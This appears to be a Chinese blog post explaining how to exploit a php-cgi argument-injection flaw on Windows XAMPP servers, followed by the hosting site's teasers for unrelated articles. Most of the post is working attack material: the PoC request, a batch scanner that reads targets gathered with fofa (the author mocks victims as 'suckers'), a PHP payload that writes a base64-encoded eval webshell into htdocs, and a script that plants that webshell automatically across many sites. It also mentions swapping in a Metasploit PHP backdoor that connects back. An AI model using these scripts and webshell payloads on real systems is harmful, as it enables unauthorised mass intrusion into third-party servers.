php-cgi漏洞利用

embedded/2024/9/24 5:07:59/

phpcgi_0">php-cgi漏洞利用

对喽,这里只是关于这个漏洞的利用方式,具体分析的可以看,先知社区

poc

/php-cgi/php-cgi.exe?%ADd+allow_url_include%3Don+%ADd+auto_prepend_file%3Dphp%3A//input
REDIRECT-STATUS: 1

这个漏洞出来的有些久了,那就先来写个简单的批量检测脚本(找个大冤种测试)


# 目标URL
import requestsfor url in open("a.txt"):urls=url.replace('\n', '')+"/php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input";data = '<?php ?>'headers={"Redirect-Status":"1"}proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080',}try:response = requests.post(urls, data=data,proxies=proxies,headers=headers,verify=False)if response.status_code==200:print(url.replace('\n', '') + "存在漏洞")if "text" in response.text:print(url.replace('\n', '')+"存在漏洞")except:print(url.replace('\n', '') + "不存在漏洞")

这里有两种检测方式,第一种是通过检测返回包中的特定字符,第二种是通过网站状态码进行检测,都能找到大冤种,字典的话,通过fofa语法提取一些即可

那么也是找到了一个大冤种,
首先通过执行命令的方式找一下webshell应该存放的目录
这里网站的根目录也就是C:\\xampp\\htdocs\\,也就是xampp的默认目录,
配合file_put_contents方法,上传一句话木马,那么就是

<?php file_put_contents("C:\\xampp\\htdocs\\phpinfo.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4="))

这会出现几个问题首先phpinfo.php如果在目录下存在的话,就无法写入,其次就是一句话木马的查杀问题,
当然了,如果不是默认路径的话,最简单的利用方式就是换盘符,也就是CDEFG都访问一下,那么写个py脚本,直接利用

import requests
import refor url in open("a.txt"):urls=url.replace('\n', '')+"/php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input";data = '<?php ?>'headers={"Redirect-Status":"1"}proxies = {'http': 'http://127.0.0.1:8080','https': 'http://127.0.0.1:8080',}try:response = requests.post(urls, data=data,proxies=proxies,headers=headers,verify=False)if response.status_code==200:print(url.replace('\n', '') + "存在漏洞")data1='<?php system("chdir")?>'response = requests.post(urls, data=data1, proxies=proxies, headers=headers, verify=False)pattern = r"[A-Za-z]:\\(?:[^\\\/:*?\"<>|]+\\)*[^\\\/:*?\"<>|]*"lujing=re.findall(pattern,response.text)path=lujing[0].replace("php","htdocs\\phpin.php").replace("\\","\\\\")data2= '<?php file_put_contents('+path+', base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2EnXSk7Pz4="));?>'response = requests.post(urls, data=data2, proxies=proxies, headers=headers, verify=False)response = requests.post(urls+"/phpin.fo",proxies=proxies, verify=False)if response.status_code==200:print(urls+"/phpin.fo")except:continue

代理我这边设置的是burp中转小飞机,使用的话,自行测试一下即可

第二种方法

msf生成php后门,然后直接替换POST中data的木马,但是这种模式有很大的局限性,回连是可以回连,执行命令等情况,经常会断开,可能是因为php不能够重复执行命令的原因


http://www.ppmy.cn/embedded/115919.html

相关文章

大数据:快速入门Scala+Flink

一、什么是Scala Scala 是一种多范式编程语言&#xff0c;它结合了面向对象编程和函数式编程的特性。Scala 这个名字是“可扩展语言”&#xff08;Scalable Language&#xff09;的缩写&#xff0c;意味着它被设计为能够适应不同规模的项目&#xff0c;从小型脚本到大型分布式…

Nginx-HTTP和反向代理web服务器

概述 Nginx (engine x) 是一个高性能的HTTP和反向代理web服务器 &#xff0c;同时也提供了IMAP/POP3/SMTP服务。Nginx是由伊戈尔赛索耶夫为俄罗斯访问量第二的Rambler.ru站点&#xff08;俄文&#xff1a;Рамблер&#xff09;开发的&#xff0c;公开版本1.19.6发布于20…

【android10】【binder】【3.向servicemanager注册服务】

系列文章目录 可跳转到下面链接查看下表所有内容https://blog.csdn.net/handsomethefirst/article/details/138226266?spm1001.2014.3001.5501文章浏览阅读2次。系列文章大全https://blog.csdn.net/handsomethefirst/article/details/138226266?spm1001.2014.3001.5501 目录 …

C语言之指针

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 目录 文章目录 前言 一、指针是什么&#xff1f; 二、指针变量的创建和指针类型 2.1 指针变量的定义 2.2 指针变量的创建 2.3 指针变量的类型 2.4 NULL 指针&#xff08;空…

Linux 常用命令大全

一、文件与目录操作命令 1.1 ls —— 列出目录内容 ls ls -l # 以详细信息显示目录内容 ls -a # 显示隐藏文件ls 命令用于列出当前目录的内容&#xff0c;常与 -l&#xff08;长格式&#xff09;和 -a&#xff08;显示隐藏文件&#xff09;选项结合使用。 1.2 cd —— 切换…

辛普森积分公式

辛普森公式是用于数值积分的一种方法&#xff0c;其基本思想是将积分区间等分成若干小段&#xff0c;并在每一小段内用一个二次函数来近似代替被积函数&#xff0c;从而计算积分值。它是一种比较精确的数值积分方法&#xff0c;比其他常见的数值积分方法&#xff08;如梯形法和…

【Java】关键字-final【主线学习笔记】

文章目录 前言关键字-final的使用1. final变量2. final方法3. final类 下一篇 前言 Java是一门功能强大且广泛应用的编程语言&#xff0c;具有跨平台性和高效的执行速度&#xff0c;广受开发者喜爱。在接下来的学习过程中&#xff0c;我将记录学习过程中的基础语法、框架和实践…

Android WebView H5 Hybrid 混和开发

对于故乡&#xff0c;我忽然有了新的理解&#xff1a;人的故乡&#xff0c;并不止于一块特定的土地&#xff0c;而是一种辽阔无比的心情&#xff0c;不受空间和时间的限制&#xff1b;这心情一经唤起&#xff0c;就是你已经回到了故乡。——《记忆与印象》 前言 移动互联网发展…